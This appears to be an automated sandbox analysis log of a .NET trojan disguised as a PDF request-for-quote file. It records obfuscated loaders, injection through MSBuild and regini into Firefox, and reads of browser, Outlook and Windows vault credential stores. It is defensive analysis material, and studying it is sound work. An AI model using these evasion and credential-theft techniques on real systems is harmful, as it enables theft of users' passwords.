                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, IJ6UC68YOxsykVHtee.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, hu0NnvCl5pXqnShn53.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, hu0NnvCl5pXqnShn53.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, hu0NnvCl5pXqnShn53.csSecurity API names: _0020.AddAccessRule
                Source: 7.2.regini.exe.27cda98.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                Source: 7.2.regini.exe.27cda98.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                Source: 7.2.regini.exe.27cda98.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 8.2.shazRxxmQwU.exe.317cd14.1.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                Source: 8.2.shazRxxmQwU.exe.317cd14.1.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                Source: 8.2.shazRxxmQwU.exe.317cd14.1.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: *.sln
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: /ignoreprojectextensions:.sln
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@6/6
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ3978 39793980.pdf.exe.logJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeMutant created: NULL
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\aGyXbWYnlQdxNP
                Source: C:\Windows\SysWOW64\regini.exeFile created: C:\Users\user\AppData\Local\Temp\7-6E2al6Jump to behavior
                Source: RFQ3978 39793980.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: RFQ3978 39793980.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: regini.exe, 00000007.00000002.3560035805.0000000002887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: unknownProcess created: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe "C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe"
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: RFQ3978 39793980.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RFQ3978 39793980.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: shazRxxmQwU.exe, 00000006.00000002.3560481153.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp, shazRxxmQwU.exe, 00000008.00000002.3559802937.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2355221160.0000000002B8B000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2352532116.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000007.00000003.2355221160.0000000002B8B000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2352532116.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: MSBuild.exe, 00000005.00000002.2352511009.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560223659.00000000007D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: MSBuild.exe, 00000005.00000002.2352511009.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560223659.00000000007D8000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: RFQ3978 39793980.pdf.exe, ServerForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 0.2.RFQ3978 39793980.pdf.exe.3764468.0.raw.unpack, MainForm.cs.Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, hu0NnvCl5pXqnShn53.cs.Net Code: brTLff1Kpe System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, hu0NnvCl5pXqnShn53.cs.Net Code: brTLff1Kpe System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, hu0NnvCl5pXqnShn53.cs.Net Code: brTLff1Kpe System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_025BA1A1 push ecx; retf 0_2_025BA1A3
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_025B4658 push edx; retf 0004h0_2_025B465A
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_025B4779 push esi; retf 0004h0_2_025B477A
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_025BC733 push es; retf 0_2_025BC736
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_025B47B0 push esi; retf 0004h0_2_025B47B2
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_025BA848 pushfd ; retf 0004h0_2_025BAA12
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_025B97DB pushfd ; retf 0_2_025B97DE
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_025B5F23 pushfd ; retf 0_2_025B5F26
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_04D40DD8 push CC04CADBh; retf 0_2_04D40DDD
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeCode function: 0_2_04D45856 push ss; retf 0_2_04D45861
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041A84A push cs; ret 5_2_0041A84F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00411964 push ds; retf 5_2_00411966
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00414A73 push eax; retf 5_2_00414A74
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00414355 pushfd ; iretd 5_2_00414356
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_004033C0 push eax; ret 5_2_004033C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00417475 push ds; retf 5_2_00417478
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0040B4B9 push ss; ret 5_2_0040B4BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00416635 push es; retf 5_2_00416674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_004166AE push es; retf 5_2_00416674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_010E225F pushad ; ret 5_2_010E27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_010E27FA pushad ; ret 5_2_010E27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011109AD push ecx; mov dword ptr [esp], ecx5_2_011109B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_010E283D push eax; iretd 5_2_010E2858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_010E1368 push eax; iretd 5_2_010E1369
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D4225F pushad ; ret 7_2_02D427F9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D427FA pushad ; ret 7_2_02D427F9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D4283D push eax; iretd 7_2_02D42858
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D709AD push ecx; mov dword ptr [esp], ecx7_2_02D709B6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D41366 push eax; iretd 7_2_02D41369
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004A80F6 push ss; ret 7_2_004A80F9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004B40B2 push ds; retf 7_2_004B40B5
                Source: RFQ3978 39793980.pdf.exeStatic PE information: section name: .text entropy: 7.712373186885482
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, PBj6MrJ4qttK5WRqmjB.csHigh entropy of concatenated method names: 'ToString', 'TDTb8mnTEa', 'EFCblxU3Lr', 'V08b7EmM42', 'n4Sb0CZMFJ', 'gSmbXTHpNb', 'bnEb5GGBXx', 'C8UbqUcKaV', 'a20PGn6AI5BidqItreu', 'FLrGfZ6TwCB1HlMZYaB'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, hu0NnvCl5pXqnShn53.csHigh entropy of concatenated method names: 'EijvarGhPa', 'NnWvdd0cmB', 'yOOvN8ecZE', 'kdgvIPFCoy', 'TnEvGiDuBa', 'yk7viV3UvK', 'pNMvowNcnT', 'H3vvClx377', 'hGKvgXYikx', 'kA3v6vZcJd'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, uDdPq5SSsTgtCfGult.csHigh entropy of concatenated method names: 'eNTZP6MMyl', 'mt3ZktPjq9', 'IkIDM3IIZI', 'KRQDJINOuh', 'cYNZOad33q', 'IefZ3iwjU4', 'N0bZwgqCMi', 'pOHZt8yR9D', 'TuZZ2MtBXj', 'l1RZynWBvd'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, Cjl5nlWxacufWc9j66.csHigh entropy of concatenated method names: 'WXRodnlCwQ', 'kP5oI3T9wv', 'Es0oiE9eOT', 'cecikcHKIE', 'ja4izASsGl', 'a6DoMBEwMg', 'jKHoJB2v1J', 'trOo4N6BZL', 'YRGovnPsvF', 'CQUoLU9lqa'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, d5iEQbEai2WGGbtQeE.csHigh entropy of concatenated method names: 'I9gVFrZNWX', 'O1eVZH36hq', 'nMdVVpHITq', 'HOgVbv3asX', 'P57VcYd4Ow', 'AAbVhTmncD', 'Dispose', 'shLDdxNoSU', 'iZZDNYcMVm', 's5kDI17Zdh'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, n0Ec4941V8pAeRoCBI.csHigh entropy of concatenated method names: 'jeXffEvAR', 'l7cmNFoPW', 'Ru9uHYoNP', 'OVipeMahW', 'GOcliqjKs', 'JS57fN4hH', 'fScCnVfJ7sMoIF93g3', 'QWbk23iEnK8NcdG8b5', 'oU9DvcPCt', 'vbtR3UpBe'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, slP2qVtvydIdFP1CiV.csHigh entropy of concatenated method names: 'OOkFKLmqsZ', 'w1GF3dN1I6', 'S4tFtCndVo', 'IcOF23xOns', 'cdfFXU4a6n', 'MAlF5lmoPs', 'KPiFqTvC36', 'WeLFehfn0u', 'QFKFQDlVDM', 'qQWFWGhkS6'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, Cuv6qVj0OfZ7uX2GRd.csHigh entropy of concatenated method names: 'Gf7V0tEfP1', 'LGcVXgOOQ5', 'BA1V5HlU8F', 'oRsVq9JmHi', 'UjWVeLDGxr', 'LM8VQadEFL', 'fqyVWsyeiG', 'rp8VUaJ616', 'SEtVrlihgb', 'Q5kVKR2E10'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, f2i6HZrXmruBjgMFi9.csHigh entropy of concatenated method names: 'BwAo1f9EoZ', 'vOZoTCKGb7', 'L9LofsM4Xy', 'avmomhCt5Q', 'nVeo90rwXa', 'N4mounNhAV', 'nagopAUdF0', 'RNEo84t17X', 'EPAolJJppy', 'aAgo7iLURV'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, lyDO55NGir3exlIpbG.csHigh entropy of concatenated method names: 'Dispose', 'SWGJjGbtQe', 'EyM4XSCf9K', 'mgBclQOIef', 'VxpJkSUBmI', 'RR8JzuEZBD', 'ProcessDialogKey', 'mOu4Muv6qV', 'GOf4JZ7uX2', 'iRd44yHAHu'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, hT40iKJLBf5bHBRraTf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SewxVlpq1Y', 'o3exRMSTlb', 'XNgxb04GYr', 'qWaxxQE6cN', 'cmKxcYHxml', 'VTuxHuoFd0', 'uiMxhyg0ht'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, X5j5JmLpPHLNnncO1L.csHigh entropy of concatenated method names: 'jxqJoJ6UC6', 'pOxJCsykVH', 'P1UJ6G9o9t', 'xZUJsbPa0a', 'VgkJFQhBWA', 'OmRJYIIsnU', 'tDNjIH7yiTpVs60c6k', 'KW0USvSqusuxvoYtu1', 'rNiJJcO66E', 'OUjJvBrX8y'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, IWYkp3wVTHLkM3PdwN.csHigh entropy of concatenated method names: 'sR5B8kWnuP', 'J0BBldvTdv', 'QdXB0Fi3Tq', 'geIBX0UDai', 'oYJBq6FD6j', 'BRtBedQLup', 'ElrBWfTKCb', 'xnJBU9Xa6N', 'WiBBKL4WV0', 'OGTBO3ZJeZ'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, Nvtpmwl1UG9o9t1ZUb.csHigh entropy of concatenated method names: 'OTEImePWeQ', 'bvGIuVtfO6', 'G6RI87nqy9', 'W1aIljwEhj', 'S8hIFv80lq', 'bvxIYpNrPd', 'RKcIZO0yQW', 'OagIDfDHyQ', 'H8hIVYIcat', 'TE5IRZAvuR'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, Wa0ahX7UnPHLaEgkQh.csHigh entropy of concatenated method names: 'FLvG9O8Xm5', 'PaRGpiq5NL', 'f83I52DmQD', 'Tk5Iq3eAWM', 'kRXIeEwath', 'qm4IQF2j7X', 'bxQIWsljcH', 'YVjIUHf8To', 'yRmIrt9T5u', 'gadIK7Y3Zh'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, i1ysRwn5uJHGk9UWYS.csHigh entropy of concatenated method names: 'QDgZ6376M2', 'Ly0ZsoBjnU', 'ToString', 'ydUZdlvRRJ', 'fJiZNUDvlM', 'VDPZI1Omsh', 'sHEZGKoAUt', 'ojIZiOMvxU', 'JIuZoDTd0t', 'UhAZC9D8NV'
